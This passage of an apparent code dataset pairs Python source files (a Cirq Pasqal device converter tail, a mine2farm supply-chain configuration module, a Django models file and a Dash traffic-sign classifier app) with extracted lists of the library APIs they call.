\"\n \"It isn't a native PasqalDevice operation, \"\n \"a 1 or 2 qubit gate with a known unitary, \"\n \"or composite.\".format(bad)\n )\n\n return cirq.protocols.decompose(\n op,\n keep=keep,\n intercepting_decomposer=self._convert_one,\n on_stuck_raise=None if self.ignore_failures else on_stuck_raise,\n )\n"},"apis":{"kind":"list like","value":["numpy.sqrt","cirq.protocols.decompose","cirq.AnyIntegerPowerGateFamily","cirq._compat.deprecated","networkx.from_edgelist","cirq._compat.deprecated_class","cirq.protocols.obj_to_dict_helper","cirq_pasqal.PasqalGateset"],"string":"[\n \"numpy.sqrt\",\n \"cirq.protocols.decompose\",\n \"cirq.AnyIntegerPowerGateFamily\",\n \"cirq._compat.deprecated\",\n \"networkx.from_edgelist\",\n \"cirq._compat.deprecated_class\",\n \"cirq.protocols.obj_to_dict_helper\",\n \"cirq_pasqal.PasqalGateset\"\n]"},"extract_api":{"kind":"string","value":"[((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '\"\"\"v0.16\"\"\"', 'fix': '\"\"\"Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).\"\"\"'}), \"(deadline='v0.16', fix=\\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\\n\", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '\"\"\"Use metadata.qubit_set() if applicable.\"\"\"', 'deadline': '\"\"\"v0.15\"\"\"'}), \"(fix='Use metadata.qubit_set() if applicable.', deadline=\\n 'v0.15')\\n\", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', \"['qubits']\"], {}), \"(self, ['qubits'])\\n\", (6107, 6125), False, 'import cirq\\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\\n', (10526, 10582), True, 'import numpy as np\\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', \"['control_radius', 'qubits']\"], {}), \"(self, ['control_radius', 'qubits'])\\n\", (10950, 10986), False, 'import cirq\\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\\n _convert_one, on_stuck_raise=None if self.ignore_failures else\\n on_stuck_raise)\\n', (11867, 11999), False, 'import cirq\\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\\n', (2763, 2815), True, 'import networkx as nx\\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\\n', (7849, 7865), False, 'import cirq\\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) ** 2 + (p.col - 
q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\\n', (10385, 10430), True, 'import numpy as np\\n')]"}}},{"rowIdx":746,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\n\nfrom enum import Enum, IntEnum, unique\nimport os\n\n\nAPP_NAME = \"mine2farm\"\nNETWORK_NAME = \"CenterAxis\"\nLOG_LEVEL_CONSOLE = \"WARNING\"\nLOG_LEVEL_FILE = \"INFO\"\nAPP_FOLDER = os.getenv(\"JESA_MINE2FARM_HOME\", \"C:/GitRepos/mine2farm/\")\nLOG_FOLDER = APP_FOLDER + \"app/log/\"\nLOG_FILE = \"%(asctime)_\" + APP_NAME + \".log\"\nOUTPUT_FOLDER = \"%s%s\" % (APP_FOLDER, \"outputs/\")\nCANVAS_URL = \"http://127.0.0.1/canvas.xlsm\"\n\n\n# DB\nDB_NAME = None\nDB_HOST = \"172.29.161.208\"\nDB_PORT = 5006\n\nDATA_SERVICE_ADD = \"172.29.161.208\"\nDATA_SERVICE_PORT = 5001\n\n\n# Results\nDB_RESULT_NAME = \"%s_results\" % DB_NAME if DB_NAME is not None else None\nDB_DETAILED_RESULT_COLLECTION_NAME = \"detailed\"\nDB_GLOBAL_RESULT_COLLECTION_NAME = \"global\"\nDB_GLOBAL_BEST_RESULT_COLLECTION_NAME = \"global_best\"\nDB_DETAILED_BEST_RESULT_COLLECTION_NAME = \"detailed_best\"\nDB_SENSITIVITY_COLLECTION_NAME = \"sensitivity\"\nRESULT_BATCHES_SIZE = 25\nHEAD_DATA_BITS = 17\nDB_NAME_BITS = 20\nRANDOMIZE_RESULTS = False\n\n\n# RabbitMQ\nRABBITMQ_SERVER = \"localhost\"\nRABBITMQ_SIMULATOR_QUEUE_NAME = \"SIMULATE\"\nRABBITMQ_CYCLE = 3\nRABBITMQ_DETAILED_RESULT_QUEUE_NAME = \"SAVE_DETAIL\"\nRABBITMQ_GLOBAL_RESULT_QUEUE_NAME = \"SAVE_GLOBAL\"\nRABBITMQ_MAX_WORKER = RABBITMQ_CYCLE\nRABBITMQ_PATH = \"C:\\\\Program Files\\\\RabbitMQ Server\\\\rabbitmq_server-3.8.1\\\\sbin\"\n\n\n# Memcached\nMEMCACHED_SERVER = 'localhost'\nMEMCACHED_PORT = 11211\n\n\n# Dashboard\nDB_LOAD_FROM_SERVICE = True\n\n\n# Monitoring\nMONITORING_APP_NAME = \"mine2farm_monitor\"\nMONITORING_SERVER = \"172.29.161.208\"\nMONITORING_PORT = 5002\nMONITORING_DB_NAME = \"task_history\"\nMONITORING_COLLECTION_HISTORY_NAME = \"task\"\nMONITORING_COLLECTION_HISTORY_BEST_NAME = \"best_scenarios_history\"\nMONITORING_STEP = 1\nMONITORING_NB_PAGE = 10\n\n\n# Mongodb-bi\nMONGODB_BI_PATH = \"C:\\\\Program Files\\\\MongoDB\\\\Connector for BI\\\\2.13\\\\bin\"\n\n\n# Mongodb\nMONGO_SERVER_PATH = \"C:\\\\Program Files\\\\MongoDB\\\\Server\\\\4.0\\\\bin\"\n\n\n# params\nLOGISTICS_LP = False\nMODE_DEBUG = False\nGRANUL_RELAX = False\n\n\nclass HTML_STATUS(IntEnum):\n ERROR = -1\n OK = 0\n\n\n# Model\nMONIKER_SEPARATOR = \"/\"\nWACC = 0.1\nT0 = 2020\nTMAX = 2031\n\nclass PriceParams(Enum):\n WACC = 0\n TENOR = 1\n VOLUME = 2\n\nclass PipelineType(Enum):\n COMMON = 0\n PRODUCER = 1\n TRANSPORT = 2\n BALANCE = 3\n PRICE = 4\n SALES = 5\n\n@unique\nclass PipelineLayer(IntEnum):\n UNDEFINED = -1\n MINE = 0\n BENEFICIATION = 1\n SAP = 2\n PAP = 3\n GRANULATION = 4\n LOGISTICS = 5\n RAW_MATERIALS = 8\n COMMON = 9\n SALES_PLAN = 10\n MINE_BENEFICIATION = 11\n UNIT_CONVERSION_MATRIX = 12\n\nPIPELINE_SCHEMA = {\n PipelineLayer.COMMON: {\n \"type\": PipelineType.COMMON,\n \"dico\": [\"location\", \"opex\", \"unit\", \"currency\", \"output\", \"names\", \"products\"]\n },\n\n PipelineLayer.MINE: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"mine.name\", \"mine.extraction\", \"mine.quality\", \"mine.capex\"],\n \"options\": \"mining_options\",\n \"production\": \"mining_specific_production\",\n \"opex\": \"mining_opex___specific_consumptions\",\n \"capex\": \"mining_capex\",\n \"priority_mines\": \"prioritymines\"\n },\n\n PipelineLayer.BENEFICIATION: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"beneficiation.name\", 
\"beneficitation.process\", \"beneficitation.quality\", \"beneficitation.capex\"],\n \"options\": \"beneficiation_options\",\n \"production\": \"beneficiation_production\",\n \"opex\": \"beneficiation_opex___specific_consumptions\",\n \"capex\": \"beneficiation_capex\"\n },\n\n PipelineLayer.SAP: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"sap.name\", \"sap.process\", \"sap.product\", \"sap.capex\", \"sap.capacity[kt]\"],\n \"options\": \"sap___power_plant_options\",\n \"production\": \"sap___power_plant_production\",\n \"opex\": \"sap___power_plant_opex___specific_consumptions\",\n \"capex\": \"sap___power_plant_capex\",\n \"product_type\": \"sap.product\"\n },\n\n PipelineLayer.PAP: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"pap.name\", \"pap.process\", \"pap.product\", \"pap.capex\", \"pap.size[kt]\", \"pap.input\"],\n \"options\": \"pap_options\",\n \"production\": \"pap_production\",\n \"opex\": \"pap_opex___specific_consumptions\",\n \"capex\": \"pap_capex\",\n \"product_type\": \"pap.product\"\n },\n\n PipelineLayer.GRANULATION: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"granulation.name\", \"granulation.process\", \"granulation.product\", \"granulation.capex\", \"granulation.input\"],\n \"options\": \"granulation_options\",\n \"production\": \"granulation_production\",\n \"opex\": \"granulation_opex\",\n \"capex\": \"granulation_capex\"\n },\n\n PipelineLayer.LOGISTICS: {\n \"type\": PipelineType.TRANSPORT,\n \"dico\": [\"logistics.name\", \"logistics.process\", \"logistics.product\", \"logistics.capex\"],\n \"options\": \"logistics_options\",\n \"production\": None,\n \"opex\": \"logistics_opex\",\n \"capex\": \"logistics_capex\"\n },\n\n PipelineLayer.RAW_MATERIALS: {\n \"type\": PipelineType.PRICE,\n \"data\": \"raw_materials\"\n },\n\n PipelineLayer.SALES_PLAN: {\n \"type\": PipelineType.SALES,\n \"data\": \"sales_plan\"\n },\n PipelineLayer.UNIT_CONVERSION_MATRIX: {\n \"type\": PipelineType.COMMON,\n \"data\": \"conv_matrix\"\n },\n}\n\n\n\nSUPPLY_CHAIN = \"mine2port\"\nDEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE),\n \"sap2pap\": (PipelineLayer.SAP, PipelineLayer.PAP)}\nCOMBO_NODES = {\n PipelineLayer.MINE_BENEFICIATION: {\n \"url\": \"mining_wp_connections\",\n \"upstream_layer\": PipelineLayer.MINE,\n \"downstream_layer\": PipelineLayer.BENEFICIATION\n }\n}\nCOMBO_NODES_SEPARATION = \"--\"\n\nclass FunctionType(Enum):\n COST_PV = 0\n CASH_COST = 1\n FULL_COST = 2\n\nclass ScenarioGeneratorType(IntEnum):\n FROM_PATHS = 0\n FROM_OPTIONS = 1\n SPECIFIC_SCENARIOS = 2\nSCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS\n\nPIPELINE_METADATA = {\n PipelineLayer.MINE: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Name\", \"Extraction\", \"Quality\", \"Unit\"],\n \"opex\": [\"Name\", \"Extraction\", \"Capacity\", \"Item\", \"Unit\"],\n \"capex\": [\"Name\", \"Extraction\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.BENEFICIATION: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"InputQuality\", \"OutputQuality\", \"Humidity\", \"Unit\"],\n \"opex\": [\"Process\", \"InputQuality\", \"OutputQuality\", \"Item\", \"Unit\"],\n \"capex\": [\"Name\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.SAP: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Location\", \"Process\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"Process\", \"Item\", \"Unit\"],\n \"capex\": [\"Location\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n 
PipelineLayer.PAP: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"Input\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"Process\", \"Capacity\", \"Input\", \"Item\", \"Product\", \"Unit\"],\n \"capex\": [\"Location\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.GRANULATION: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"Input\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"ProductionSite\", \"Process\", \"Capacity\", \"Product\", \"Item\", \"Unit\"],\n \"capex\": [\"Location\", \"ProductionSite\", \"Product\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.LOGISTICS: {\n \"type\": PipelineType.TRANSPORT,\n \"opex\": [\"Upstream\", \"Downstream\", \"Method\", \"Product\", \"Capacity\", \"Item\", \"Unit\"],\n \"capex\": [\"Upstream\", \"Downstream\", \"Method\", \"Product\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.RAW_MATERIALS: {\n \"type\": PipelineType.PRICE,\n \"columns\": [\"Item\", \"Unit\"]\n },\n PipelineLayer.SALES_PLAN: {\n \"type\": PipelineType.PRICE,\n \"columns\": [\"Type\", \"Product\", \"Unit\"]\n },\n PipelineLayer.UNIT_CONVERSION_MATRIX: {\n \"type\": PipelineType.COMMON,\n \"columns\": [\"Initial Unit\", \"Uniform Unit\", \"Conversion Rate\"]\n },\n}\n\n\nclass ShuffleLevel(IntEnum):\n UNDEFINED = 0\n SHUFFLE_WITHOUT_PERM = 1\n SHUFFLE_WITH_PERMUTATIONS = 2\n SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3\n SHUFFLE_WITH_UNNAMED = 4\n\n\nSHUFFLE_LEVELS = {\n PipelineLayer.MINE: ShuffleLevel.UNDEFINED,\n PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,\n PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,\n PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,\n PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,\n PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,\n PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED\n}"},"apis":{"kind":"list like","value":["os.getenv"],"string":"[\n \"os.getenv\"\n]"},"extract_api":{"kind":"string","value":"[((195, 253), 'os.getenv', 'os.getenv', (['\"\"\"JESA_MINE2FARM_HOME\"\"\"', '\"\"\"C:/GitRepos/mine2farm/\"\"\"'], {}), \"('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\\n\", (204, 253), False, 'import os\\n')]"}}},{"rowIdx":747,"cells":{"code":{"kind":"string","value":"from django.db import models\n\n# Create your models here.\n\nclass Destination(models.Model) :\n name = models.CharField(max_length = 100)\n img = models.ImageField(upload_to = 'pics')\n desc = models.TextField()\n price = models.IntegerField()\n offer = models.BooleanField(default = False)\n \nclass News() :\n id : int\n img : str\n date : int\n month : str\n headline : str\n category : str\n desc : str"},"apis":{"kind":"list like","value":["django.db.models.TextField","django.db.models.IntegerField","django.db.models.BooleanField","django.db.models.ImageField","django.db.models.CharField"],"string":"[\n \"django.db.models.TextField\",\n \"django.db.models.IntegerField\",\n \"django.db.models.BooleanField\",\n \"django.db.models.ImageField\",\n \"django.db.models.CharField\"\n]"},"extract_api":{"kind":"string","value":"[((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\\n', (119, 135), False, 'from django.db import models\\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '\"\"\"pics\"\"\"'}), \"(upload_to='pics')\\n\", (165, 183), False, 'from django.db import models\\n'), ((197, 215), 
'django.db.models.TextField', 'models.TextField', ([], {}), '()\\n', (213, 215), False, 'from django.db import models\\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\\n', (247, 249), False, 'from django.db import models\\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\\n', (281, 296), False, 'from django.db import models\\n')]"}}},{"rowIdx":748,"cells":{"code":{"kind":"string","value":"import base64\nimport io\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\n\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\nfrom constants import CLASSES\n\nimport yaml \nwith open('app.yaml') as yaml_data :\n params = yaml.safe_load(yaml_data)\n \nIMAGE_WIDTH = params['IMAGE_WIDTH']\nIMAGE_HEIGHT = params['IMAGE_HEIGHT']\nPATH_MODEL = params['PATH_MODEL']\n\n\n# Load DNN model\nclassifier = tf.keras.models.load_model(PATH_MODEL)\n\ndef classify_image(image, model, image_box=None):\n \"\"\"Classify image by model\n\n Parameters\n ----------\n content: image content\n model: tf/keras classifier\n\n Returns\n -------\n class id returned by model classifier\n \"\"\"\n images_list = []\n image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)\n # box argument clips image to (x1, y1, x2, y2)\n image = np.array(image)\n images_list.append(image)\n \n return model.predict_classes(np.array(images_list))\n\n\napp = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n\npre_style = {\n 'whiteSpace': 'pre-wrap',\n 'wordBreak': 'break-all',\n 'whiteSpace': 'normal'\n}\n\n\n# Define application layout\n\n\nnavbar = dbc.NavbarSimple(\n children=[\n dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem('Réseau de Neurones', header=True),\n dbc.DropdownMenuItem('SVM', href=\"#\"),\n ],\n nav=True,\n in_navbar=True,\n label='Modèle',\n ),\n ],\n brand=\"Menu\",\n brand_href=\"#\",\n color= \"#d90054\",\n dark=True\n)\n\ncards = html.Div( \n [\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Présentation\", className=\"card-title\"),\n html.P(\n [\n 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',\n ],\n className='card-text',\n ),\n ]\n ),\n className='w-75 mb-3', \n color='#f1cbd1', \n outline='Black', \n style={\n 'margin-top': '75px', \n 'margin-left': '185px'}, \n ),\n ]\n)\n\napp.layout = html.Div([\n html.Div([navbar]),\n \n html.Div(cards),\n dcc.Upload(\n id='bouton-chargement',\n children=html.Div([\n 'Cliquer-déposer ou ',\n html.A('sélectionner une image')\n ]),\n style={\n 'width': '50%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin-top': '75px',\n 'margin-left': '370px', \n }\n ),\n html.Div(id='mon-image'),\n html.Div(id='ma-zone-resultat')\n])\n\n@app.callback(Output('mon-image', 'children'),\n [Input('bouton-chargement', 'contents')])\ndef update_output(contents):\n if contents is not None:\n content_type, content_string = contents.split(',')\n if 'image' in content_type:\n image = Image.open(io.BytesIO(base64.b64decode(content_string)))\n predicted_class = classify_image(image, classifier)[0]\n return html.Div([\n html.Hr(style={'margin-top': '75px'}),\n html.Img(src=contents, style={'margin-left': '750px'}),\n html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),\n html.Hr(),\n #html.Div('Raw Content'),\n #html.Pre(contents, style=pre_style)\n ])\n else:\n try:\n # Décodage de l'image transmise en base 64 (cas des fichiers ppm)\n # fichier base 64 --> image PIL\n image = Image.open(io.BytesIO(base64.b64decode(content_string)))\n # image PIL --> conversion PNG --> buffer mémoire \n buffer = io.BytesIO()\n image.save(buffer, format='PNG')\n # buffer mémoire --> image base 64\n buffer.seek(0)\n img_bytes = buffer.read()\n content_string = base64.b64encode(img_bytes).decode('ascii')\n # Appel du modèle de classification\n predicted_class = classify_image(image, classifier)[0]\n # Affichage de l'image\n return html.Div([\n html.Hr(style={'margin-top': '75px'}),\n html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),\n html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),\n html.Hr(),\n ])\n except:\n return html.Div([\n html.Hr(),\n html.Div('Uniquement des images svp : {}'.format(content_type)),\n html.Hr(), \n html.Div('Raw Content'),\n html.Pre(contents, style=pre_style)\n ])\n \n\n# Manage interactions with callbacks\n@app.callback(\n Output(component_id='ma-zone-resultat', component_property='children'),\n [Input(component_id='mon-champ-texte', component_property='value')]\n)\ndef update_output_div(input_value):\n return html.H3('Valeur saisie ici \"{}\"'.format(input_value))\n\n\n# Start the application\nif __name__ == '__main__':\n app.run_server(debug=True)"},"apis":{"kind":"list like","value":["dash_bootstrap_components.DropdownMenuItem","dash.dependencies.Output","base64.b64encode","io.BytesIO","dash_html_components.H5","base64.b64decode","dash.dependencies.Input","dash_html_components.Pre","yaml.safe_load","numpy.array","dash_html_components.Div","tensorflow.keras.models.load_model","dash_html_components.Img","dash_html_components.Hr","dash_html_components.P","dash.Dash","dash_html_components.A"],"string":"[\n \"dash_bootstrap_components.DropdownMenuItem\",\n \"dash.dependencies.Output\",\n \"base64.b64encode\",\n \"io.BytesIO\",\n \"dash_html_components.H5\",\n \"base64.b64decode\",\n \"dash.dependencies.Input\",\n \"dash_html_components.Pre\",\n 
\"yaml.safe_load\",\n \"numpy.array\",\n \"dash_html_components.Div\",\n \"tensorflow.keras.models.load_model\",\n \"dash_html_components.Img\",\n \"dash_html_components.Hr\",\n \"dash_html_components.P\",\n \"dash.Dash\",\n \"dash_html_components.A\"\n]"},"extract_api":{"kind":"string","value":"[((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\\n', (550, 562), True, 'import tensorflow as tf\\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['\"\"\"Traffic Signs Recognition\"\"\"'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), \"('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\\n BOOTSTRAP])\\n\", (1092, 1171), False, 'import dash\\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\\n', (367, 378), False, 'import yaml\\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\\n', (982, 989), True, 'import numpy as np\\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['\"\"\"mon-image\"\"\"', '\"\"\"children\"\"\"'], {}), \"('mon-image', 'children')\\n\", (3351, 3376), False, 'from dash.dependencies import Input, Output\\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '\"\"\"ma-zone-resultat\"\"\"', 'component_property': '\"\"\"children\"\"\"'}), \"(component_id='ma-zone-resultat', component_property='children')\\n\", (5677, 5741), False, 'from dash.dependencies import Input, Output\\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\\n', (1060, 1073), True, 'import numpy as np\\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\\n', (2710, 2720), True, 'import dash_html_components as html\\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\\n', (2739, 2746), True, 'import dash_html_components as html\\n'), ((3265, 3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '\"\"\"mon-image\"\"\"'}), \"(id='mon-image')\\n\", (3273, 3289), True, 'import dash_html_components as html\\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '\"\"\"ma-zone-resultat\"\"\"'}), \"(id='ma-zone-resultat')\\n\", (3303, 3326), True, 'import dash_html_components as html\\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['\"\"\"bouton-chargement\"\"\"', '\"\"\"contents\"\"\"'], {}), \"('bouton-chargement', 'contents')\\n\", (3398, 3431), False, 'from dash.dependencies import Input, Output\\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '\"\"\"mon-champ-texte\"\"\"', 'component_property': '\"\"\"value\"\"\"'}), \"(component_id='mon-champ-texte', component_property='value')\\n\", (5753, 5813), False, 'from dash.dependencies import Input, Output\\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\\n', (4481, 4483), False, 'import io\\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['\"\"\"Présentation\"\"\"'], {'className': '\"\"\"card-title\"\"\"'}), \"('Présentation', className='card-title')\\n\", (1826, 1866), True, 'import dash_html_components as html\\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['[\"Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.\"\\n ]'], {'className': '\"\"\"card-text\"\"\"'}), '([\\n \"Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\\'une image. L\\'application fonctionne de la manière suivante : vous déposer une image à l\\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.\"\\n ], className=\\'card-text\\')\\n', (1894, 2301), True, 'import dash_html_components as html\\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\\n', (3645, 3661), False, 'import base64\\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': \"{'margin-top': '75px'}\"}), \"(style={'margin-top': '75px'})\\n\", (3784, 3814), True, 'import dash_html_components as html\\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': \"{'margin-left': '750px'}\"}), \"(src=contents, style={'margin-left': '750px'})\\n\", (3840, 3886), True, 'import dash_html_components as html\\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (4023, 4025), True, 'import dash_html_components as html\\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['\"\"\"Réseau de Neurones\"\"\"'], {'header': '(True)'}), \"('Réseau de Neurones', header=True)\\n\", (1431, 1466), True, 'import dash_bootstrap_components as dbc\\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['\"\"\"SVM\"\"\"'], {'href': '\"\"\"#\"\"\"'}), \"('SVM', href='#')\\n\", (1504, 1521), True, 'import dash_bootstrap_components as dbc\\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['\"\"\"sélectionner une image\"\"\"'], {}), \"('sélectionner une image')\\n\", (2885, 2911), True, 'import dash_html_components as html\\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\\n', (4360, 4376), False, 'import base64\\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\\n', (4706, 4717), False, 'import base64\\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': \"{'margin-top': '75px'}\"}), \"(style={'margin-top': '75px'})\\n\", (4957, 4987), True, 'import dash_html_components as html\\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': \"('data:image/png;base64,' + content_string)\", 'style': \"{'margin-left': '750px'}\"}), \"(src='data:image/png;base64,' + content_string, style={\\n 'margin-left': '750px'})\\n\", (5017, 5101), True, 'import dash_html_components as html\\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5241, 5243), True, 'import dash_html_components as html\\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5345, 5347), True, 'import dash_html_components as html\\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\\n', (5461, 5463), True, 'import dash_html_components as html\\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['\"\"\"Raw Content\"\"\"'], {}), \"('Raw Content')\\n\", (5509, 5524), True, 'import dash_html_components as html\\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\\n', (5554, 5581), True, 'import 
